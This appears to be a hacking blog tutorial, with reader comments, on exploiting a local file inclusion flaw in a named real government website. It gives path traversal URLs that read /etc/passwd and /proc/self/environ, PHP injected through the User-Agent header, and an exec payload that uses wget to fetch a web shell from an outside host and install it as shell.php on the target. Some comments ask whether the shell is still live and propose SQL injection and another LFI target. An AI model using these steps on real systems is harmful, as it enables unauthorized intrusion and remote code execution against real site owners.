images (284×177)Lets Starts 

Few Things You Need to Start 
1) Site vulnerable to LFI ( http://www.bislig.gov.ph )
2) Remote shell ( http://www.yourhosting/urshell.txt
3) User-Agent switcher ( https://addons.mozilla.org/en-US/firefox...-switcher/
4) Mozilla Firefox Browser 



Lfimap-icon.png (74×74)First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd
Example: 
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd

Ok fine...We can open etc/passwd
Now type proc/self/environ

Example:
http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ



Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.
Now make new user-agentGo to New > New User-Agent
You will get something like this:


<?php phpinfo();?>
Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.
You should get something like this in your site.


Now search for "disable_functions" (Ctrl+F Search function)
Mine is
disable_functions     | no value    | no value
That is good.We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:
<?exec('wget http://www.sh3ll.org/egy.txt -O shell.php');?>

(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to http://www.LFISITE.com/shell.php (Mine is http://www.bislig.gov.ph/shell.php )

Voila,we have our shell up.
Enjoy.
Demo websites :)

About The Author : This Post was Written by AV, catch him on his Blog, If You are aslo Intrested in writing a Guest Post then visit this Page


9 comments:

  1. nice Tutorial(MaC)

    ReplyDelete
  2. really nice1....

    ReplyDelete
  3. example site fix now

    ReplyDelete
  4. is the shell still there??

    ReplyDelete
  5. not fixed ... Try sql injection content1.php?mainmenu_id=54'

    ReplyDelete
  6. !lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"

    ReplyDelete
  7. This comment has been removed by a blog administrator.

    ReplyDelete

If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.

Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!

Thanks for reading,
Admin

 
Top